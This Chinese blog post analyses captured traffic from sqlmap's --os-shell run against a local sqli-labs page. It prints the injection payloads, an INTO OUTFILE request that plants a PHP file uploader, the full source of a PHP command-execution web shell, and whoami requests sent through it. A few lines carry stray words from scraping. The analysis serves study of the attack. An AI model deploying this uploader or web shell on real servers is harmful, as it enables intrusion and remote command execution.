对利用sqlmap获取os-shell过程的一次抓包分析

时间  2019-11-16
标签 利用 sqlmap 获取 shell 过程 一次 抓包 分析 栏目 Unix 繁體版
原文   原文链接

本地执行完整过程

D:\sqlmap>python2 sqlmap.py -u http://127.0.0.1/SQL/Less-1/?id=1 --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:10:10

[23:10:10] [INFO] resuming back-end DBMS 'mysql'
[23:10:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3621=3621 AND 'GLUP'='GLUP

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT (ELT(3041=3041,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ErWL'='ErWL

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'spJe'='spJe

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3185' UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4362634876576a754d757a6b534357506b55784569476b68786c616f6179476a796c464c6479666e,0x7171787a71),NULL-- KQNY
---
[23:10:10] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.37, PHP 5.6.37
back-end DBMS: MySQL >= 5.0
[23:10:10] [INFO] going to use a web backdoor for command prompt
[23:10:10] [INFO] fingerprinting the back-end DBMS operating system
[23:10:10] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: E:\www\apache\Apache24\htdocs
[23:10:50] [WARNING] unable to automatically parse any web server path
[23:10:50] [INFO] trying to upload the file stager on 'E:/www/apache/Apache24/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[23:10:50] [INFO] the file stager has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpumgnt.php
[23:10:50] [INFO] the backdoor has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpbwejn.php
[23:10:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a]
command standard output:    'desktop-ei9lgn7\bxscope'
os-shell>

执行以上过程在本地一共抓到22个http数据包,其中11个请求包,11个响应包,下边依次对它们进行简要分析

0x01

请求
GET /SQL/Less-1/?id=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

这次sqlmap只进行了一次简单的 get 请求,应该是判断目标是否可达php

值得注意的是这里的 User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)html

而后本地服务器返回了一个响应数据包,返回正常页面内容python

响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:10 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 721
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00"> 
<font size='5' color= '#99FF00'>Your Login name:Dumb<br>Your Password:Dumb</font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

0x02

请求
GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

这次请求是在如下事件发生后进行的:
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[23:10:27] [WARNING] unable to automatically retrieve the web server document rootmysql

这次sqlmap在参数id后加了个%5D%5B,转码后就是 [],也就是把参数以数组的形式传递给了服务端,难道是想让网站报错爆出网站路径?没看源码不是很清楚...web

此次返回的响应数据与第一次返回的不一样sql

响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:27 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

0x03

请求
GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d453a5c5c7777775c5c6170616368655c5c41706163686532345c5c6874646f63735c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--%20- HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache

会发现第三次请求的参数很长,转换后以下shell

id=-1086' OR 3105=3105 LIMIT 0,1 INTO OUTFILE 'E:/www/apache/Apache24/htdocs/tmpumgnt.php' LINES TERMINATED BY <?php
if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\\www\\apache\\Apache24\\htdocs\\> <input type=submit name=upload value=upload></form>";}?>

利用mysql的 SELECT ... INTO OUTFILE ... LINES TERMINATED BY上传脚本apache

代码展开后以下:数组

<?php
if (isset($_REQUEST["upload"])){
    $dir=$_REQUEST["uploadDir"];
    if (phpversion()<'4.1.0'){
        $file=$HTTP_POST_FILES["file"]["name"];
        @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }
    else{
        $file=$_FILES["file"]["name"];
        @move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
    }@chmod($dir."/".$file,0755);
    echo "File uploaded";
}
else {
echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\\www\\apache\\Apache24\\htdocs\\> <input type=submit name=upload value=upload></form>";
}?>

提供文件上传功能服务器

此次返回的响应数据和第二次返回的数据彻底同样

响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 670
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>
<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00"> 
<font color= "#FFFF00"></font></font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

第四到八次请求全是用来判断文件上传到了哪里,这里请求的次数应该是跟0x02中提供的E:/www/apache/Apache24/htdocs/tmpumgnt.php路径深度有关

0x04

请求
GET /www/apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 237
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /www/apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x05

请求
GET /apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 233
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x06

请求
GET /Apache24/htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x07

请求
GET /htdocs/tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 404 Not Found
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
Content-Length: 217
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /htdocs/tmpumgnt.php was not found on this server.</p>
</body></html>

0x08

请求
GET /tmpumgnt.php HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 330
Connection: close
Content-Type: text/html; charset=UTF-8

1   Dumb    Dumb<form action=/tmpumgnt.php method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>

0x09

请求
POST /tmpumgnt.php?id=1 HTTP/1.1
Content-Length: 1334
Accept-Encoding: gzip,deflate
Connection: close
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Host: 127.0.0.1
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=169.254.227.55.1.10780.1558019450.459.1

--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="uploadDir"

E:\www\apache\Apache24\htdocs\
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="upload"

1
--169.254.227.55.1.10780.1558019450.459.1
Content-Disposition: form-data; name="file"; filename="tmpbwejn.php"
Content-Type: application/octet-stream

<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
--169.254.227.55.1.10780.1558019450.459.1--

代码展开后:

<?php 
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);
$z=@ini_get('disable_functions');
if(!empty($z)){
    $z=preg_replace('/[, ]+/',',',$z);
    $z=explode(',',$z);
    $z=array_map('trim',$z);
}
else{
    $z=array();
}
$c=$c." 2>&1\n";
function f($n){
    global $z;
    return is_callable($n)and!in_array($n,$z);
}
if(f('system')){
    ob_start();
    system($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('proc_open')){
    $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
    $w=NULL;
    while(!feof($t[1])){
        $w.=fread($t[1],512);
    }
    @proc_close($y);
}
elseif(f('shell_exec')){
    $w=shell_exec($c);
}
elseif(f('passthru')){
    ob_start();
    passthru($c);
    $w=ob_get_contents();
    ob_end_clean();
}
elseif(f('popen')){
    $x=popen($c,r);
    $w=NULL;
    if(is_resource($x)){
        while(!feof($x)){
            $w.=fread($x,512);
        }
    }
    @pclose($x);
}
elseif(f('exec')){
    $w=array();
    exec($c,$w);
    $w=join(chr(10),$w).chr(10);
}
else{
    $w=0;
}
print "<pre>".$w."</pre>";?>

该脚本先从客户请求中获取cmd的值赋值给 $c

设置脚本最大执行时间为无限

设置客户端断开链接时也不中断脚本执行

获取配置文件中禁用的函数列表赋值给 $z

若是禁用的函数列表 $z 不为空

  • 把列表中的全部英文逗号或者空格所有替换为英文逗号赋值给 $z
  • 而后按英文逗号分隔把该函数列表转换为数组赋值给 $z
  • 去除数组中每一个元素首尾的空白字符赋值给 $z

若是禁用的函数列表为空,就把 $z 初始化为空数组

而后 $c=$c." 2>&1\n"

定义函数 f($n)

  • 调用全局变量$z
  • 若是 $n 能够被调用而且不在数组 $z 中返回true,不然返回false

若是 f('system') 为 true

  • 打开输出缓冲
  • 执行cmd命令 $c
  • 获取缓冲区中的内容赋值给 $w
  • 清除缓冲区并关闭输出缓冲

不然若是 f('proc_open') 为 true

  • 好像是建立一个子进程,执行命令,而后把执行结果写入到管道中
  • 从管道中读取命令的执行结果赋值给 $w
  • 关闭进程资源

不然若是 f('shell_exec') 为 true

  • 经过 shell 环境执行命令,将结果返回给 $w

不然若是 f('passthru') 为 true

  • 打开输出缓冲
  • 执行命令
  • 将缓冲区的内容赋值给 $w
  • 清楚缓冲区并关闭输出缓冲

不然若是 f('popen') 为 true

  • 打开一个指向进程的管道,执行命令,返回一个fopen()相同的文件指针 $x
  • 读取该指针所指向的资源赋值给 $w
  • 关闭该资源 $x

不然若是 f('exec') 为 true

  • $w 初始化为空数组
  • 执行命令并将结果填充到 $w 数组中
  • 将数组 $w 转换为用 chr(10) 链接的字符串

不然

  • $w = 0

最后 print "<pre>".$w."</pre>"

响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 24
Connection: close
Content-Type: text/html; charset=UTF-8

1   Dumb    DumbFile uploaded

0x0a

请求
GET /tmpbwejn.php?cmd=echo%20command%20execution%20test HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:10:50 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>command execution test 
</pre>

0x0b

请求
GET /tmpbwejn.php?cmd=whoami HTTP/1.1
Accept-Encoding: gzip,deflate
Host: 127.0.0.1
Accept: */*
User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
Connection: close
Cache-Control: no-cache
响应
HTTP/1.1 200 OK
Date: Thu, 16 May 2019 15:11:08 GMT
Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
X-Powered-By: PHP/5.6.37
Content-Length: 36
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>desktop-ei9lgn7\bxscope
</pre>
相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程